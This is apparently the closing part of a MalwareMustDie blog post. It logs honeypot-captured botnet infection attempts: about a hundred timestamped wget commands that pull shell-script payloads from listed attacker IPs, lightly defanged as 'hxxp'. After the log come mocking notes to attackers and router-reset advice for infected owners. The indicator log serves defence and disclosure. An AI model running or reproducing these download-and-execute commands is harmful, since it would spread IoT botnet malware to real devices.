2016-01-08 21:25:29 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-08 21:24:16 | wget hxxp:// 31.14.136.142/bins . sh
2016-01-08 21:15:42 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-08 21:00:41 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-08 20:50:57 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-08 20:33:48 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-08 20:25:50 | wget ftx://51.254.238.19/gb . sh
2016-01-08 20:24:00 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-08 19:48:28 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-08 17:43:31 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-08 17:33:44 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-08 17:19:57 | wget hxp://208.67.1.3/DOGDICKS/Binarys . sh
2016-01-08 16:57:53 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-08 16:25:16 | wget ftx://51.254.238.19/gb . sh
2016-01-08 15:39:48 | wget ftx://51.254.238.19/gb . sh
2016-01-08 15:19:47 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-08 15:09:47 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-08 14:59:52 | wget ftx://51.254.238.19/gb . sh
2016-01-08 14:29:56 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-08 14:19:51 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-08 14:01:43 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-08 13:51:37 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-08 13:09:57 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-08 12:51:41 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-08 12:32:19 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-08 12:29:03 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-08 12:22:09 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-08 12:19:37 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-08 12:07:29 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-08 10:36:57 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-08 10:27:09 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-08 10:07:45 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-08 09:54:24 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-08 09:44:30 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-08 08:43:10 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-08 08:43:10 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-08 08:28:11 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-08 01:20:08 | wget -q hxxp:// 198.23.238.251/gb . sh
2016-01-08 00:58:02 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-08 00:51:41 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-07 23:35:21 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-07 23:25:51 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-07 21:40:10 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-07 21:30:41 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-07 19:37:00 | wget hxxp:// 192.227.170.67/Binaries . sh
2016-01-07 16:10:32 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-07 16:09:53 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-07 15:48:18 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-07 15:38:35 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-07 11:59:09 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-07 11:54:25 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-07 09:05:52 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-07 09:03:16 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-07 08:56:09 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-07 08:29:38 | wget hxxp:// 185.130.5.246/bin . sh
2016-01-07 08:24:46 | wget hxxp:// 185.130.5.246/bin . sh
2016-01-07 08:24:46 | wget hxxp:// 185.130.5.246/bin . sh
2016-01-07 07:45:01 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-07 07:21:11 | wget hxxp:// 185.130.5.246/bin . sh
2016-01-07 07:16:17 | wget hxxp:// 185.130.5.246/bin . sh
2016-01-07 05:33:06 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-07 05:18:10 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-07 05:04:59 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-07 03:03:21 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-07 02:55:07 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-07 02:43:59 | wget hxxp:// 192.227.170.67/Binaries . sh
2016-01-07 02:32:13 | busybox wget hxxp:// 80.82.64.177/fucks . sh
2016-01-07 02:32:13 | wget1 hxxp:// 80.82.64.177/fucks2 . sh
2016-01-07 02:27:28 | busybox wget hxxp:// 80.82.64.177/fucks . sh
2016-01-07 02:27:28 | wget1 hxxp:// 80.82.64.177/fucks2 . sh
2016-01-07 00:14:11 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-06 17:20:08 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 17:09:58 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 16:54:11 | wget hxxp:// 208.67.1.142/DOGDICKS/Binarys . sh
2016-01-06 16:45:04 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 16:35:27 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 16:06:23 | wget hxxp:// 208.89.211.141/cocks . sh-O /tmp/cocks . sh
2016-01-06 14:13:15 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-06 13:27:48 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 13:18:09 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 10:41:35 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-06 09:56:04 | wget hxxp:// "freedomstress.com"/test/Binarys . sh
2016-01-06 09:41:12 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 09:31:28 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 07:40:31 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-06 07:23:01 | wget -q hxxp:// 198.23.238.251/gb . sh
2016-01-06 07:10:37 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-06 05:49:41 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 05:40:06 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 05:29:56 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-06 05:29:55 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-06 05:23:13 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 05:13:42 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 03:21:23 | wget hxxp:// 5.196.249.163/IRC/loldongs . sh
2016-01-06 03:12:31 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 02:12:26 | wget hxxp:// 79.143.181.158/gtop . sh
2016-01-06 02:03:21 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 01:53:42 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 01:41:14 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-06 01:28:19 | wget hxxp:// 94.102.53.144/bin . sh

6. Host up-check results (42 are up)

-----------------------------------------------------------------
UpChecked: 70 IP addresses (42 hosts up) scanned in 24.34 seconds
Sun Feb  7 12:37:12 #MalwareMustDie!
-----------------------------------------------------------------

StickyNote: Additional recent updates indicator (IP for infection panel or CNC)↓

/* Reformatted from previous embedded tweets */
/* Sorted in chronological/dates             */


Notes:

Thank you to the friends who contributed so much to this data, and for their willingness to share it to keep infections from getting out of control.

Just for LOL, thanks for the FREE promotion of MalwareMustDie.ORG, skiddies :))

We have a much better KungFu than yours kiddo :)

#MalwareMustDie!


Fear thou not; 
for I [am] with thee: be not dismayed; 
for I [am] thy God: I will strengthen thee; 
yea, I will help thee; 
yea, I will uphold thee with the right hand of my righteousness.

☩Isaiah 41:10  

1 comment:

  1. Answering the communication received regarding to the post:

    1. If we have a router that has been hacked and is being used by this threat's badness, they mostly gain access through the default login and password or, with lesser chance, through exploitation of a GUI vulnerability. Home / SOHO routers mostly get pwned up to the root user, so in order to fix it you must RESET the router to its factory base settings. Set it up again with more secure settings, like using your own password, not opening telnet ports, limiting access to SSH through the firewall settings, and so on. Then save the configuration outside of the router so that it can be restored fast if you have another incident.

    2. Mostly, hackers want to OWN the system but don't want to mess up the system. Even if you cannot access the device remotely anymore, you still have direct hard access to the router hardware; just reset it and restore it with the better settings described above. Just avoid simple passwords and terminate unnecessary services too, and start optimizing the firewall.
